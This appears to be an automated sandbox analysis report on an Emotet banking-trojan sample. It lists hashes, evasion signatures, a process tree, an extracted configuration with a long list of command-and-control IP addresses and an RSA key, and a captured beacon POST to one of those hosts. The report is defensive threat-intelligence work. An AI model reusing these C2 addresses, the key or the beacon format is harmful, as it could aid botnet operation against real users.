Loading ...

Play interactive tourEdit tour

Analysis Report TOfDTHKl.exe

Overview

General Information

Sample Name:TOfDTHKl.exe
Analysis ID:289508
MD5:f19a285b3a805702cee7a4fd579604a8
SHA1:3700dd2380fdec532f55d0568f274be0448d2780
SHA256:aee0d860e14af14cfceed5e04e957560f3b447d30c4a364598681b8b9aad5fa9

Most interesting Screenshot:

Detection

Emotet
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • svchost.exe (PID: 6596 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TOfDTHKl.exe (PID: 6616 cmdline: 'C:\Users\user\Desktop\TOfDTHKl.exe' MD5: F19A285B3A805702CEE7A4FD579604A8)
    • unregmp2.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\Faultrep\unregmp2.exe MD5: F19A285B3A805702CEE7A4FD579604A8)
  • svchost.exe (PID: 6648 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6260 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6552 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5280 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5476 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5664 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2244 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6412 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["174.106.122.139:80", "159.203.116.47:8080", "173.249.6.108:443", "104.236.246.93:8080", "174.45.13.118:80", "137.59.187.107:8080", "94.200.114.161:80", "37.187.72.193:8080", "67.10.155.92:80", "121.124.124.40:7080", "24.43.99.75:80", "75.139.38.211:80", "109.74.5.95:8080", "137.119.36.33:80", "74.134.41.124:80", "66.65.136.14:80", "94.1.108.190:443", "181.169.235.7:80", "79.137.83.50:443", "104.131.44.150:8080", "121.7.127.163:80", "96.249.236.156:443", "120.150.60.189:80", "134.209.36.254:8080", "110.145.77.103:80", "118.83.154.64:443", "71.72.196.159:80", "50.91.114.38:80", "62.75.141.82:80", "157.245.99.39:8080", "140.186.212.146:80", "168.235.67.138:7080", "104.131.11.150:443", "78.24.219.147:8080", "46.105.131.79:8080", "104.251.33.179:80", "24.43.32.186:80", "200.114.213.233:8080", "153.137.36.142:80", "85.96.199.93:80", "94.23.237.171:443", "5.39.91.110:7080", "85.152.162.105:80", "162.241.242.173:8080", "213.196.135.145:80", "139.99.158.11:443", "194.187.133.160:443", "78.187.156.31:80", "1.221.254.82:80", "124.41.215.226:80", "139.130.242.43:80", "209.141.54.221:8080", "87.106.136.232:8080", "83.169.36.251:8080", "195.7.12.8:80", "185.94.252.104:443", "95.213.236.64:8080", "42.200.107.142:80", "203.153.216.189:7080", "68.188.112.97:80", "5.196.74.210:8080", "87.106.139.101:8080", "104.32.141.43:80", "94.124.59.22:8080", "74.219.172.26:80", "108.46.29.236:80", "93.147.212.206:80", "172.104.97.173:8080", "190.240.194.77:443", "103.86.49.11:8080", "74.208.45.104:8080", "82.80.155.43:80", "61.19.246.238:443", "139.162.108.71:8080", "121.7.31.214:80", "188.219.31.12:80", "37.139.21.175:8080", "181.169.34.190:80", "219.74.18.66:443", "123.176.25.234:80", "216.139.123.119:80", "79.98.24.39:8080", "62.30.7.67:443", "139.162.60.124:8080", "176.111.60.55:8080", "91.211.88.52:7080", "172.91.208.86:80", "139.59.60.244:8080", "107.5.122.110:80", "50.35.17.13:80", "97.82.79.83:80", "68.252.26.78:80", "110.142.236.207:80", "47.144.21.12:443", "24.137.76.62:80", "220.245.198.194:80", "74.120.55.163:80", "24.179.13.119:80", "113.61.66.94:80", "174.106.122.139:80", "159.203.116.47:8080", "173.249.6.108:443", "104.236.246.93:8080", "174.45.13.118:80", "137.59.187.107:8080", "94.200.114.161:80", "37.187.72.193:8080", "67.10.155.92:80", "121.124.124.40:7080", "24.43.99.75:80", "75.139.38.211:80", "109.74.5.95:8080", "137.119.36.33:80", "74.134.41.124:80", "66.65.136.14:80", "94.1.108.190:443", "181.169.235.7:80", "79.137.83.50:443", "104.131.44.150:8080", "121.7.127.163:80", "96.249.236.156:443", "120.150.60.189:80", "134.209.36.254:8080", "110.145.77.103:80", "118.83.154.64:443", "71.72.196.159:80", "50.91.114.38:80", "62.75.141.82:80", "157.245.99.39:8080", "140.186.212.146:80", "168.235.67.138:7080", "104.131.11.150:443", "78.24.219.147:8080", "46.105.131.79:8080", "104.251.33.179:80", "24.43.32.186:80", "200.114.213.233:8080", "153.137.36.142:80", "85.96.199.93:80", "94.23.237.171:443", "5.39.91.110:7080", "85.152.162.105:80", "162.241.242.173:8080", "213.196.135.145:80", "139.99.158.11:443", "194.187.133.160:443", "78.187.156.31:80", "1.221.254.82:80", "124.41.215.226:80", "139.130.242.43:80", "209.141.54.221:8080", "87.106.136.232:8080", "83.169.36.251:8080", "195.7.12.8:80", "185.94.252.104:443", "95.213.236.64:8080", "42.200.107.142:80", "203.153.216.189:7080", "68.188.112.97:80", "5.196.74.210:8080", "87.106.139.101:8080", "104.32.141.43:80", "94.124.59.22:8080", "74.219.172.26:80", "108.46.29.236:80", "93.147.212.206:80", "172.104.97.173:8080", "190.240.194.77:443", "103.86.49.11:8080", "74.208.45.104:8080", "82.80.155.43:80", "61.19.246.238:443", "139.162.108.71:8080", "121.7.31.214:80", "188.219.31.12:80", "37.139.21.175:8080", "181.169.34.190:80", "219.74.18.66:443", "123.176.25.234:80", "216.139.123.119:80", "79.98.24.39:8080", "62.30.7.67:443", "139.162.60.124:8080", "176.111.60.55:8080", "91.211.88.52:7080", "172.91.208.86:80", "139.59.60.244:8080", "107.5.122.110:80", "50.35.17.13:80", "97.82.79.83:80", "68.252.26.78:80", "110.142.236.207:80", "47.144.21.12:443", "24.137.76.62:80", "220.245.198.194:80", "74.120.55.163:80", "24.179.13.119:80", "113.61.66.94:80"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.471301140.00000000004E4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000001.00000002.205426555.0000000002081000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000001.00000002.205338355.0000000002050000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000001.00000002.205378378.0000000002064000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000003.00000002.471359419.0000000000511000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.unregmp2.exe.510000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              1.2.TOfDTHKl.exe.2080000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000003.00000002.471301140.00000000004E4000.00000004.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["174.106.122.139:80", "159.203.116.47:8080", "173.249.6.108:443", "104.236.246.93:8080", "174.45.13.118:80", "137.59.187.107:8080", "94.200.114.161:80", "37.187.72.193:8080", "67.10.155.92:80", "121.124.124.40:7080", "24.43.99.75:80", "75.139.38.211:80", "109.74.5.95:8080", "137.119.36.33:80", "74.134.41.124:80", "66.65.136.14:80", "94.1.108.190:443", "181.169.235.7:80", "79.137.83.50:443", "104.131.44.150:8080", "121.7.127.163:80", "96.249.236.156:443", "120.150.60.189:80", "134.209.36.254:8080", "110.145.77.103:80", "118.83.154.64:443", "71.72.196.159:80", "50.91.114.38:80", "62.75.141.82:80", "157.245.99.39:8080", "140.186.212.146:80", "168.235.67.138:7080", "104.131.11.150:443", "78.24.219.147:8080", "46.105.131.79:8080", "104.251.33.179:80", "24.43.32.186:80", "200.114.213.233:8080", "153.137.36.142:80", "85.96.199.93:80", "94.23.237.171:443", "5.39.91.110:7080", "85.152.162.105:80", "162.241.242.173:8080", "213.196.135.145:80", "139.99.158.11:443", "194.187.133.160:443", "78.187.156.31:80", "1.221.254.82:80", "124.41.215.226:80", "139.130.242.43:80", "209.141.54.221:8080", "87.106.136.232:8080", "83.169.36.251:8080", "195.7.12.8:80", "185.94.252.104:443", "95.213.236.64:8080", "42.200.107.142:80", "203.153.216.189:7080", "68.188.112.97:80", "5.196.74.210:8080", "87.106.139.101:8080", "104.32.141.43:80", "94.124.59.22:8080", "74.219.172.26:80", "108.46.29.236:80", "93.147.212.206:80", "172.104.97.173:8080", "190.240.194.77:443", "103.86.49.11:8080", "74.208.45.104:8080", "82.80.155.43:80", "61.19.246.238:443", "139.162.108.71:8080", "121.7.31.214:80", "188.219.31.12:80", "37.139.21.175:8080", "181.169.34.190:80", "219.74.18.66:443", "123.176.25.234:80", "216.139.123.119:80", "79.98.24.39:8080", "62.30.7.67:443", "139.162.60.124:8080", "176.111.60.55:8080", "91.211.88.52:7080", "172.91.208.86:80", "139.59.60.244:8080", "107.5.122.110:80", "50.35.17.13:80", "97.82.79.83:80", "68.252.26.78:80", "110.142.236.207:80", "47.144.21.12:443", "24.137.76.62:80", "220.245.198.194:80", "74.120.55.163:80", "24.179.13.119:80", "113.61.66.94:80", "174.106.122.139:80", "159.203.116.47:8080", "173.249.6.108:443", "104.236.246.93:8080", "174.45.13.118:80", "137.59.187.107:8080", "94.200.114.161:80", "37.187.72.193:8080", "67.10.155.92:80", "121.124.124.40:7080", "24.43.99.75:80", "75.139.38.211:80", "109.74.5.95:8080", "137.119.36.33:80", "74.134.41.124:80", "66.65.136.14:80", "94.1.108.190:443", "181.169.235.7:80", "79.137.83.50:443", "104.131.44.150:8080", "121.7.127.163:80", "96.249.236.156:443", "120.150.60.189:80", "134.209.36.254:8080", "110.145.77.103:80", "118.83.154.64:443", "71.72.196.159:80", "50.91.114.38:80", "62.75.141.82:80", "157.245.99.39:8080", "140.186.212.146:80", "168.235.67.138:7080", "104.131.11.150:443", "78.24.219.147:8080", "46.105.131.79:8080", "104.251.33.179:80", "24.43.32.186:80", "200.114.213.233:8080", "153.137.36.142:80", "85.96.199.93:80", "94.23.237.171:443", "5.39.91.110:7080", "85.152.162.105:80", "162.2
                Multi AV Scanner detection for submitted fileShow sources
                Source: TOfDTHKl.exeVirustotal: Detection: 10%Perma Link
                Source: TOfDTHKl.exeReversingLabs: Detection: 12%
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02083810 FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,1_2_02083810
                Source: Joe Sandbox ViewIP Address: 174.106.122.139 174.106.122.139
                Source: Joe Sandbox ViewASN Name: TWC-11426-CAROLINASUS TWC-11426-CAROLINASUS
                Source: global trafficHTTP traffic detected: POST /WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.106.122.139/WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------AkDekGTz9Host: 174.106.122.139Content-Length: 4596Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.106.122.139/WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------AkDekGTz9Host: 174.106.122.139Content-Length: 4596Cache-Control: no-cacheData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 6b 44 65 6b 47 54 7a 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 65 61 71 7a 62 6f 6f 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 75 70 79 74 64 75 64 66 71 6d 71 69 6a 72 62 63 69 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 59 0c c1 da e1 b9 e2 51 b9 05 1a 95 93 19 1b 55 f4 11 9c 31 7b ea 07 1d 6c 27 9c 46 aa ac 2a 4a b9 a8 fa 58 41 de b6 0e 5f 43 c2 ee 94 62 28 4a 8d f2 3c da 95 25 41 94 72 4d 38 d5 cf 53 22 fd c7 6b 58 4e 93 87 78 a6 55 e7 88 0a ed 05 72 a7 67 9a 7d 3f 77 f6 d8 14 96 66 4c 22 71 66 ca 2e 4f b2 99 9f f4 92 cc f4 d2 87 1c 23 62 f1 e3 82 b0 e1 8f 78 4c ff 8c 15 0a c3 7d 16 5c 8e 57 b8 b5 e1 58 8f 1e 72 27 c3 eb f3 ce db 83 36 47 26 df f0 25 b4 67 25 3f 0c 1d 0d 21 e3 ee b4 0e fa 7d be 1e b2 29 e2 54 aa cc ca 9a 44 77 78 f8 bc 2c 52 72 04 19 ce 14 e5 47 2a 0d e0 cb 79 93 e2 5a 11 df 05 14 9d 1c 5d 7e cc ae 5a 71 a1 b7 26 ee 25 9f b7 bf 94 36 83 0e 45 03 bc c8 96 40 c4 68 cc 11 38 77 f6 93 e0 41 cc 2a 11 30 83 da 77 76 14 ed 03 59 3b c6 e4 f4 83 95 6d 8e 5e d8 36 e9 88 7e 37 05 f8 41 e1 a2 a3 47 52 86 88 1f fc 20 38 ff fd 49 66 0c 35 c3 81 06 95 6f dc 72 3a d0 02 e3 78 3a b6 f6 d0 a9 28 52 18 29 f2 98 75 42 a2 7e 59 83 00 18 a5 e4 0a d0 55 05 cf 1b c4 cd 34 ac 5a ea a3 82 00 59 b8 ee b0 fd 93 a4 c1 68 00 ed 77 5a 06 3a e8 6e db 38 c1 d5 6e e1 a0 03 ad 1a 0d e0 c4 82 31 7b ff ce 84 9f 9c 51 6b fe 36 ec 28 72 33 5e 23 0f 6f a1 2a 68 00 f1 28 97 b1 df 6c 05 0e c0 25 04 4d 75 4a cc 70 c0 3d 92 cb e1 a9 13 11 70 ed 69 d7 6a 3b ef 12 bd d8 57 91 17 58 91 01 97 d4 4c 04 e0 19 c0 e7 14 14 15 1a 02 68 43 8b ed d8 cf c2 d0 94 4a 3d 89 cb 71 03 89 48 63 87 c8 fa d6 52 a0 71 13 2f cf f1 d7 fd 5f 54 e8 bd 17 57 fb 94 aa c0 e6 84 3a 08 49 c3 4f b7 e6 67 2c 89 17 49 91 5a fe 10 1a a5 12 0c 2e 54 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 6b 44 65 6b 47 54 7a 39 2d 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: -----------AkDekGTz9Content-Disposition: form-data; name="eaqzboo"; filename="upytdudfqmqijrbci"Content-Type: application/octet-streamYQ
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: unknownTCP traffic detected without corresponding DNS query: 174.106.122.139
                Source: svchost.exe, 00000012.00000003.360584543.00000269669D9000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-09-22T19:12:55.3225945Z||.||5cf543b6-b372-4e6c-b8a0-d33819d40a21||1152921505691572521||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 00000012.00000003.360584543.00000269669D9000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-09-22T19:12:55.3225945Z||.||5cf543b6-b372-4e6c-b8a0-d33819d40a21||1152921505691572521||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                Source: svchost.exe, 00000012.00000003.361191391.0000026966928000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook)
                Source: svchost.exe, 00000012.00000003.361191391.0000026966928000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.twitter.com (Twitter)
